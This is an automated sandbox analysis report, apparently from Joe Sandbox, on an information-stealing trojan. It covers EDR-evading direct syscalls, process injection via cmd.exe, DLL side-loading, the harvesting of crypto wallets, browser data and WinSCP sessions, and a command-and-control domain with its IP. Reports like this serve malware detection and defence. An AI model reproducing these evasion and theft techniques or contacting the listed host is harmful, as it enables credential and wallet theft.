                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CD4A7D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CD4A7D6

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF6AC4707F6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC23C4E3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC2EECD2Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF6AC46D36CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC40E70AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC305E2FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC246878Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtRequestWaitReplyPort: Direct from: 0x7FF6AC37B423Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeNtQuerySystemInformation: Direct from: 0xE550CAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Indirect: 0x14012000F
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtReadFile: Direct from: 0x7FF6AC2EAB61Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC341E98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC47DCC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF6AC2E269CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC471AF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC47FB2EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtOpenFile: Direct from: 0x7FF7AB3B2A93Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtOpenFile: Direct from: 0x7FFBCB7626A1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2F104AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC30415AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryInformationToken: Direct from: 0x7FF6AC30C074Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC39F97EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryInformationProcess: Direct from: 0x7FF6AC2F06C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC34BA08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtEnumerateValueKey: Direct from: 0x7FF6AC2DA43CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtSetInformationProcess: Direct from: 0x7FF6AC2F1C9AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC348AFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtOpenFile: Direct from: 0x7FF7AB5516CAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC373A63Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC2E7907Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC478555Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC240984Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Direct from: 0x7FF6AC472D4B
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtOpenFile: Direct from: 0x7FF7AB3BD9BBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateThreadEx: Direct from: 0x7FF6AC234A16Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF7AB3EC074Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC2E4D6AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC240CDFJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC31049BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryValueKey: Direct from: 0x7FF6AC30F960Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeNtSetInformationThread: Direct from: 0x6C37ADFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryInformationToken: Direct from: 0x7FF6AC37E6D7Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC2DA568Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC2DDDC9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC347139Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtDeviceIoControlFile: Direct from: 0x7FF6AC2EA103Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Direct from: 0x7FF6AC472D5F
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtReadVirtualMemory: Direct from: 0x7FF6AC46D04BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC23F124Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC303711Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Direct from: 0x14011D864
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC47FC06Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeNtSetInformationThread: Direct from: 0x6C2DADFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryValueKey: Direct from: 0x7FF6AC310402Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC2384B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC248E7DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FFBCB784B5EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateThreadEx: Direct from: 0x7FF6AC2347BEJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeNtQuerySystemInformation: Direct from: 0x1D50CAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC2DD9BBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC37568CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryValueKey: Direct from: 0x7FF6AC30FED9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Direct from: 0x7FF6AC472D6D
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2E4C2DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQuerySystemInformation: Direct from: 0x7FF6AC412F5DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2F6D15Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF7AB54D36CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF7AB5507F6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC2D2A93Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryInformationToken: Direct from: 0x7FF6AC3432A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2EC47DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Direct from: 0x7FF6AC470823
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2938A9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC37B22BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC40F8CEJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC4716CAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryValueKey: Direct from: 0x7FF6AC310516Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2559C6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtSetInformationProcess: Direct from: 0x7FF6AC2F05E6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeNtSetInformationThread: Direct from: 0x6BD9ADFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtOpenKeyEx: Direct from: 0x7FF6AC30F4B2Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF7AB3C269CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtQueryInformationProcess: Direct from: 0x7FF6AC2E2B3BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2EAB04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC4176C9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC23CFC7Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF7AB427139Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC246EB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2344D2Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtClose: Direct from: 0x7FF6AC34742F
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC34B948Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6AC381678Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtCreateFile: Direct from: 0x7FF7AB4232A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC2405E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6AC345AC1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 2FB010Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe base: 2B5010Jump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeProcess created: C:\Users\user\AppData\Local\Temp\hv.exe "C:\Users\user\AppData\Local\Temp\hv.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe C:\Users\user\AppData\Local\Temp\Localdockerv3.exeJump to behavior
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: Localdockerv3.exe, 00000008.00000003.1997630296.0000000000A9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                  Source: Localdockerv3.exe, 00000008.00000002.2160661904.0000000000A93000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
                  Source: Localdockerv3.exe, 00000008.00000003.1957732743.0000000000AF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Exodus\exodus.wallet
                  Source: Localdockerv3.exe, 00000008.00000003.1938789281.0000000000AF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: t\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-releaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kz8kl7vh.defaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  11
                  DLL Side-Loading
                  212
                  Process Injection
                  11
                  Masquerading
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Abuse Elevation Control Mechanism
                  1
                  Virtualization/Sandbox Evasion
                  1
                  Credentials in Registry
                  211
                  Security Software Discovery
                  Remote Desktop Protocol21
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                  DLL Side-Loading
                  212
                  Process Injection
                  Security Account Manager1
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive13
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS2
                  Process Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Abuse Elevation Control Mechanism
                  LSA Secrets13
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Obfuscated Files or Information
                  Cached Domain Credentials146
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581191 Sample: 9mauyKC3JW.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 59 digoperonodice3.online 2->59 63 Suricata IDS alerts for network traffic 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for dropped file 2->67 69 4 other signatures 2->69 10 9mauyKC3JW.exe 6 2->10         started        13 hv.exe 5 2->13         started        16 hv.exe 5 2->16         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\...\iepdf32.dll, PE32 10->55 dropped 57 C:\Users\user\AppData\Local\Temp\hv.exe, PE32 10->57 dropped 18 hv.exe 9 10->18         started        101 Maps a DLL or memory area into another process 13->101 103 Found direct / indirect Syscall (likely to bypass EDR) 13->103 22 cmd.exe 2 13->22         started        24 cmd.exe 16->24         started        signatures6 process7 file8 45 C:\Users\user\AppData\Roaming\...\iepdf32.dll, PE32 18->45 dropped 47 C:\Users\user\AppData\Roaming\...\hv.exe, PE32 18->47 dropped 71 Switches to a custom stack to bypass stack traces 18->71 73 Found direct / indirect Syscall (likely to bypass EDR) 18->73 26 hv.exe 5 18->26         started        49 C:\Users\user\AppData\Local\Temp\cvnmq, PE32+ 22->49 dropped 75 Writes to foreign memory regions 22->75 77 Maps a DLL or memory area into another process 22->77 29 Localdockerv3.exe 22->29         started        31 conhost.exe 22->31         started        33 conhost.exe 24->33         started        signatures9 process10 signatures11 95 Maps a DLL or memory area into another process 26->95 97 Switches to a custom stack to bypass stack traces 26->97 99 Found direct / indirect Syscall (likely to bypass EDR) 26->99 35 cmd.exe 5 26->35         started        process12 file13 51 C:\Users\user\AppData\Local\Temp\yhg, PE32+ 35->51 dropped 53 C:\Users\user\AppData\...\Localdockerv3.exe, PE32+ 35->53 dropped 79 Writes to foreign memory regions 35->79 81 Found hidden mapped module (file has been removed from disk) 35->81 83 Maps a DLL or memory area into another process 35->83 85 Switches to a custom stack to bypass stack traces 35->85 39 Localdockerv3.exe 35->39         started        43 conhost.exe 35->43         started        signatures14 process15 dnsIp16 61 digoperonodice3.online 172.67.153.243, 443, 49711, 49713 CLOUDFLARENETUS United States 39->61 87 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->87 89 Found many strings related to Crypto-Wallets (likely being stolen) 39->89 91 Tries to harvest and steal browser information (history, passwords, etc) 39->91 93 2 other signatures 39->93 signatures17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  9mauyKC3JW.exe29%VirustotalBrowse
                  9mauyKC3JW.exe42%ReversingLabsWin32.Trojan.Nekark
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\yhg100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\cvnmq100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Localdockerv3.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\hv.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\iepdf32.dll39%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Roaming\Chromewizard\hv.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dll39%ReversingLabsWin32.Trojan.Generic
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://digoperonodice3.online:443/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4i0%Avira URL Cloudsafe
                  https://www.handyviewer.com/openSV0%Avira URL Cloudsafe
                  https://digoperonodice3.online/Ohio-Vall9~0%Avira URL Cloudsafe
